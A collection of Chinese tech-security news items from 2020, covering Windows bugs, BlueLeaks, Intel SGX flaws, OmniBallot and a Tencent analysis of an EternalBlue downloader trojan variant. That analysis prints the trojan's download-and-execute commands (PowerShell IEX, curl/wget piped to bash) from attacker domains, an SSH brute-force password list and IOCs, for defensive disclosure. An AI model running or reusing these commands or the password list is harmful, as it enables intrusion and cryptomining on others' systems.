上月发布的 Windows 10 May 2020（20H1/Version 2004）功能更新在安全方面引入了诸多改进，其中就包括阻止潜在不必要程序（PUP/PUA）的能力。微软表示 PUP 包括各种类型的系统软件捆绑、驱动程序和注册表优化器等。 不过近日 Version 2004 用户反馈，即使在 PUP 应用程序被清理之后，Windows Security 应用程序依然会触发警报。在 PUP 应用程序被移除或者允许在 Windows 10 上运行之后，Windows Security 在随后的扫描中依然会检测到旧项目，造成错误的检测循环。 一位用户指出：“我在进行常规扫描时，发现这些威胁被高亮显示为低级，而且 Defender 无法删除它们，导致一直显示。我同样使用了 Malwarebytes 进行扫描，但这边并没有显示出来。” 看来，Windows Defender 已经被默认为在Windows 10 Version 2004 中识别 PUP 为威胁。在 PUP 被删除后，Windows Defender 在随后的历史记录扫描中又将同一文件识别为威胁。 想要修复这个问题，你需要通过以下步骤删除PUPs历史信息： 1.打开 “文件资源管理器”。 2.导航到C:/程序数据/Microsoft/Windows Defender/Scans/History/Service。 3.在服务文件夹中，删除PUP相关文件。 4.重启Windows并在Windows安全应用中进行快速扫描。     （稿源：cnBeta，封面源自网络。）  

Red Hat 近日报告了一个内核中的安全问题，根据描述，Red Hat 内核在“关联数据的身份验证加密”（AEAD，Authenticated Encryption with Associated Data）中存在缺陷，这是一种加密技术。具体是在 IPsec 加密算法模块 authenc 的 crypto/authenc.c 中的 crypto_authenc_extractkeys 中发现了缓冲区超读漏洞。当有效载荷大于 4 字节且未遵循 4 字节对齐边界准则时，它将导致缓冲区超读威胁，从而导致系统崩溃。此漏洞使具有用户特权的本地攻击者可以执行拒绝服务。 目前该漏洞已录入 CVE-2020-10769。 不过该问题在 17 个月前也就是 19 年 1 月的 Linux LTS 内核上游中已经修复过了，详情见 https://lkml.org/lkml/2019/1/21/675。 并且在 14 个月前，该问题的回归测试也已经提交到了 LTP（Linux Test Project，Linux 测试项目），此次发现这一特定下游问题，应当是 LTP 测试未通过导致的。因此报告安全的邮件中提醒：“大多数 Linux 内核已经修复了这一错误，而没有在 LTP 中添加回归测试，这意味着挑选特定内核补丁来修复 LTP 问题不如合并所有 LTS 内核修复程序来得稳妥。”   （稿源：开源中国，封面源自网络。）

上周，美国各地警察部门的数十万份潜在敏感文件在网上泄露。这个被称为 “BlueLeaks “并可在网上搜索的集合，源于德克萨斯州一家网页设计和托管公司的安全漏洞，该公司维护着一些州的执法数据共享门户。该集合总容量近270GB，是分布式拒绝秘密(DDoSecrets)的最新发布，DDoSecrets是维基解密的另一种选择。 DDoSecrets在Twitter上发文称，BlueLeaks档案索引了 来自200多个警察部门、融合中心和其他执法培训和支持资源的十年数据，在数十万份文件中，有警察和FBI的报告、公告、指南等。融合中心是由国家拥有和运营的实体，在州、地方、部落和地区、联邦和私营部门合作伙伴之间收集和传播执法和公共安全信息。KrebsOnSecurity获得了美国国家融合中心协会（NFCA）6月20日的内部分析，证实了泄露数据的有效性。NFCA提醒指出，泄露文件的日期实际上跨越了近24年，从1996年8月到2020年6月19日，文件包括姓名、电子邮件地址、电话号码、PDF文件、图像以及大量的文本、视频、CSV和ZIP文件。 此外，数据转储还包含电子邮件和相关附件，初步分析显示，其中一些文件包含高度敏感的信息，如ACH路由号码，国际银行账户号码（IBAN）和其他金融数据，以及个人身份信息（PII）和信息请求（RFI）和其他执法和政府机构报告中列出的嫌疑人的图像。NFCA表示，BlueLeaks公布的数据似乎是在总部位于休斯顿的网络开发公司Netsential发生安全漏洞后获取的。对此次泄密事件中包含的数据的初步分析表明，Netsential是美国多个融合中心、执法部门和其他政府机构使用的网络服务公司，是此次泄密事件的源头。 NFCA表示，各种网络威胁行为者，包括民族国家、黑客活动家和有经济动机的网络犯罪分子，可能会寻求利用此次泄密事件中暴露的数据，针对融合中心和相关机构及其人员进行各种网络攻击和活动。BlueLeaks数据集发布于6月19日，又称 “六月十九日”，是美国历史最悠久的结束奴隶制的全国性纪念活动。在广泛抗议乔治-弗洛伊德被明尼阿波利斯警察杀害事件后，今年的纪念日再次引起公众的兴趣。   （稿源：cnBeta，封面源自网络。）  

2014年一个名为Turla Group的恶意软件组织消息出现，爱沙尼亚外交情报局推断它源于俄罗斯，代表俄罗斯联邦安全局（FSB）进行运作，该组织核心恶意软件也被公开描述为第一个滥用第三方程序来禁用DSE的案例。在Windows Vista中引入了这种安全机制，以防止未签名的驱动程序加载到内核空间。Turla利用了签名的VirtualBox驱动程序——VBoxDrv.sysv1.6.2来停用DSE，然后对未签名的有效负载驱动程序进行加载。 然而，这个漏洞有一些混淆，它被称为CVE-2008-3431。Turla使用的漏洞实际上滥用了两个漏洞，其中只有一个在前面提到的CVE中被修复过。另一个漏洞与CVE-2008-3431一起用在第一个攻击版本中，第二个攻击版本大约在2014年引入了内核模式恶意软件，其只使用了未修补的漏洞，我们将在后面详细讨论。 2019年2月，Unit 42发现了尚未知晓的威胁因素（信息安全社区不知道），发现第二个未修补的漏洞不仅可以利用VirtualBox VBoxDrv.sys驱动程序 v1.6.2，还可以利用 v3.0.0以下的所有其他版本。此外我们研究发现这个未知的参与者利用VirtualBox驱动程序2.2.0版，在2017年攻击至少两个不同的俄罗斯组织。我们猜测这样做是因为驱动程序版本2.2.0并不易受攻击，因此很可能不会被安全公司发现。由于没有发现其他受害者，我们认为这是一个非常罕见的恶意软件，仅用于目标攻击。 操作者使用了一个之前未知的恶意软件家族，我们称之为AcidBox。由于该恶意软件的复杂性、稀有性以及它是一个更大的工具集的一部分这一事实，我们相信它被高级威胁参与者用于定向攻击。如果攻击者仍然活跃的话，这个恶意软件很可能今天仍在使用。但是，我们预计它在一定程度上被重写了。根据我们掌握的信息，我们认为除了使用过的漏洞之外，这个未知的威胁因素与Turla无关。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1247/     消息来源：paloaltonetworks，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

本月初微软通过 Windows Update 将新版 Microsoft Edge 推送给用户，并自动取代旧版 Edge。当然，如果系统原本默认的浏览器不是 Microsoft Edge，那么升级到新版后也不会改变这一设置。 不过部分用户最近反馈的一个情况却会让人误以为微软正在另辟蹊径让他们将 Microsoft Edge 作为默认浏览器。根据用户的反馈，无论在 edge://settings/onStartup 中进行了哪种设置，无论何时启动 PC 并登录 Windows，部分 Microsoft Edge 都会随系统启动而启动。也就是说，开机并进入桌面后，Microsoft Edge 便会自动启动。 微软收到反馈的消息后，很快就确认了这是一个 bug。不过工程师目前也不能确认此错误的发生是否伴随了系统其他的行为更改。 上文提到的 edge://settings/onStartup 设置影响的是打开浏览器后的行为，与操作系统的设置并没有直接关系。 由于用户提供的信息有限，因此工程师无法定位导致 bug 产生的原因。不过根据外国科技媒体 Softpedia 的报道，这种情况发生在通过 Windows Update 自动下载安装更新的设备上。 如果你也受到此问题的影响，并且希望帮忙解决问题，可查看博客文章以获取详细信息。在博客文章中，微软提供了有关如何通过浏览器内置反馈工具共享诊断数据的完整说明。     （稿源：开源中国，封面源自网络。）

6月15日消息，上周Android 11 Beta 1正式上线，谷歌Pixel机型率先尝鲜。考虑到这是Beta版Android 11，系统方面不够稳定，不少Pixel用户升级到Android 11之后选择降级回到Android 10，然而在降级之后发现了新的Bug。 据9to5Google报道，不少用户反馈谷歌Pixel 4、Pixel 4 XL降级回到Android 10之后面部识别不能用，系统提示面部信息无法录入。 谷歌方面承认了这一错误，表示会在后续版本中修复这一bug。9to5Google提醒用户，升级到Android 11的Pixel 4系列用户谨慎降级，否则面部识别无法使用。由于Pixel 4、Pixel 4 XL仅支持3D人脸识别，没有指纹，所以降级后如果出错只能用传统的密码或者图案解锁，安全性方面会降低。 值得一提的是，除了Pixel 4系列之外，一加8系列、Realme X50 Pro系列、小米10系列、小米POCO F2 Pro、Find X2系列等都将在本月尝鲜Android 11，值得期待。     （稿源：快科技，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限，可直接攻击SMB服务造成RCE（远程代码执行），存在漏洞的计算机只要联网就可能被黑客探测攻击，并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示，至今仍有近三分之一的系统未修补该漏洞，我们再次强烈建议所有用户尽快修补SMBGhost漏洞（CVE-2020-0796）。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击，在失陷系统创建定时任务并植入挖矿木马功能，使得其攻击的范围继续扩大，包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马，并会按照惯例在开始挖矿前，清除其他挖矿木马，以便独占系统资源。挖矿活动会大量消耗企业服务器资源，使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测，针对Linux系统root用户，尝试利用弱密码进行爆破连接，爆破使用密码字典： “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令： `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测，在函数redisexec中尝试连接未设置密码的redis服务器，访问成功后执行远程命令： `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png，该脚本主要有以下功能： a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马： 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP，重新与该机器建立连接进行内网扩散攻击： 创建目录/.Xll并下载挖矿木马（d[.]ackng.com/ln/xr.zip）到该目录下，解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态，目前该木马会通过以下方法进行扩散传播： 截止2020年6月12日，永恒之蓝木马下载器家族主要版本更新列表如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

正在英特尔努力消除多个处理器漏洞造成的负面影响的时候，三所大学的安全研究人员再次无情地曝光了 SGX 软件防护扩展指令的另外两个缺陷。对于攻击者来说，这可以让他们相当轻松地提取敏感数据。庆幸的是，新问题可通过积极的补救措施得到修复，且当前尚无新漏洞已在野外被利用的相关证据。 来自美国密歇根、荷兰阿姆斯特丹、以及澳大利亚阿德莱德三所大学的研究人员披露 —— 攻击者可利用多核体系架构的工作方式，来获得对受感染系统上敏感数据的访问权限。 其已经为两个漏洞开发了对应的攻击方法，并给出了 SGAxe 和 CrossTalk 的概念证明。 前者似乎是今年早些时候曝光的 CacheOut 攻击的高级版本，黑客可从 CPU 的 L1 缓存中提取内容。 研究人员解释称，SGAxe 是英特尔减轻针对软件防护扩展（SGX）的旁路攻击的一个失败尝试。作为 CPU 上的一个专属区域，SGX 原意是确保正在处理的代码和数据的完整与机密性。 借助瞬态执行攻击，黑客可从实质上恢复存储在 SGX 区域中的加密密钥，并将之用于解密长存储区，以获得机器的 EPID 密钥。后者被用于确保事务的安全性，比如金融交易和受 DRM 保护的内容。 至于第二个 CrossTalk 漏洞，其属于微体系架构数据采样（MDS）的一个衍生，能够针对 CPU 的行填充缓冲区（LBF）处理的数据发起攻击。 其原本希望提供 CPU 内核访问的“登台缓冲区”，但黑客却能够利用在一个单独核心上运行的特制软件，来破坏保护其运行的软件代码和数据私钥。 据悉，新漏洞影响 2015 ~ 2019 年发布的多款英特尔处理器，包括部分至强 E3 SKU（E5 和 E7 系列已被证明可抵御此类新型攻击）。 英特尔在 6 月份的安全公告中称，只有极少数的人能够在实验室环境中发起这些攻击，目前尚无漏洞在野外被利用的报告。 即便如此，该公司仍将尽快发布微码更新，同时让之前签发的证明密钥失效。     （稿源：cnBeta，封面源自网络。）

OmniBallot是美国几十个司法管辖区都在使用的选举软件。除了递送选票和帮助选民标记选票外，它还包括一个在线投票的选项。至少有三个州，西弗吉尼亚州、特拉华州和新泽西州已经或计划在即将举行的选举中使用该技术。俄勒冈州和华盛顿州的四个地方司法管辖区也使用在线投票功能。但麻省理工学院的迈克尔-斯佩克特和密歇根大学的亚历克斯-哈尔德曼这对计算机科学家的新研究发现，该软件安全保护措施不足，对选举的完整性造成了严重的风险。 OmniBallot背后的公司Democracy Live在给Ars Technica的邮件回复中为其软件辩护。Democracy Live首席执行官Bryan Finney写道：”报告没有发现OmniBallot的任何技术漏洞”。从某种意义上来说，这是真的，研究人员并没有在OmniBallot代码中发现任何重大漏洞。但这也忽略了他们分析的重点。软件的安全性不仅取决于软件本身，还取决于系统运行环境的安全性。例如，如果投票软件运行在被恶意软件感染的电脑上，就不可能保证投票软件的安全。而在美国，有数百万台电脑被恶意软件感染。 这个问题现在特别紧迫，因为正在进行的COVID-19大流行迫使选举官员对选举程序作出重大改变。目前，大多数使用OmniBallot软件的司法管辖区都没有使用其 “电子选票传递 “功能。但启用该功能只需更改配置即可。选举官员有可能在远程投票更容易的压力下，决定在今年11月大选中启用该软件的在线投票功能。 Specter和Halderman取得了OmniBallot软件的副本，对其进行了逆向工程，然后创建了模仿真实服务器行为的新服务器软件。这使他们能够在不冒干扰真实选举的情况下对软件进行实验。他们发现，OmniBallot提供了一些不同的功能，州选举官员可以选择向选民提供。最基本的是空白选票交付功能，可向选民提供可打印出来并寄回投票站的PDF选票。各地也可提供选票标记功能，在选票打印出来之前，代选民标记。这可以让失明选民独立填写选票。它还可以防止多投，并警告选民没有投票。 但是Specter和Halderman认为这种能力会带来一些额外的风险。恶意软件可以被编程成在很短的时间内切换投票。理论上，选民应该在投递选票前检查选票是否正确，但研究表明，选民对此并不严格。霍尔德曼和其他人的一项研究发现，在一次现实的模拟选举中，只有6.6%的选民向选举监督人报告了投票的变化。     （稿源：cnBeta，封面源自网络。）

在昨日的补丁星期二活动日中，微软宣布扩大 Windows 10 May 2020（20H1/Version 2004）的部署范围，邀请更多用户通过手动检查 Windows Update 更新的方式获得升级。尽管升级过程非常流畅，但是部分用户反馈在升级后导致优化存储的内置工具无法正常工作。 根据用户的反馈和外媒的复现测试，升级 Windows 10 Version 2004 功能更新会导致“磁盘优化”和“碎片整理和磁盘优化”工具出现问题。 磁盘优化是 Windows 10 系统内置的工具，允许用户对碎片文件进行碎片整理并解决性能问题。默认情况下，Windows 10每周都会自动对所有分区进行维护，你可以在 “优化驱动器 “工具中查看状态。 在升级 Windows 10 Version 2004 功能更新之后，磁盘优化工具虽然可以帮助用户解决性能问题，但不能报告正确的状态。 例如，磁盘优化工具会报告说并未在你的 PC 上运行扫描，在已经执行优化操作之后依然显示需要优化。这对于想要检查驱动器健康状况的管理员来说是个大问题，因为你无法发现你的驱动器是否经过优化。 但需要注意的是，这款工具的功能并没有损坏。，它仍然可以帮助用户自动或手动修复Windows性能问题。你可以通过以下步骤来验证优化/碎片和TRIM的状态。 1.打开 “开始 “菜单。 2.输入 “事件查看器 “并打开它。 3.在 “事件查看器 “中，导航到Windows日志>应用程序。 4.右键单击应用程序并单击 “过滤当前日志”。 5.在事件源下拉菜单中选择Defrag。 6.单击 “确定”。 中间的窗格会显示一个事件列表，点击它们会在预览窗格中显示详细信息。值得注意的是，作为Windows Insider计划的一部分，该bug已经被报告给微软，有用户要求公司不要运送带有该bug的更新。 事实上，这个 BUG 曾经在今年一月发布的 Windows 10 Build 19551 更新中已经得到了修复，但是尚不清楚为何会进入到稳定版本中。微软在2020年1月23日的一篇博文中指出：“感谢您报告了磁盘优化控制面板错误地显示优化没有进行的错误提醒。我们已经在这个Build版本中修复了它。”     （稿源：cnBeta，封面源自网络。）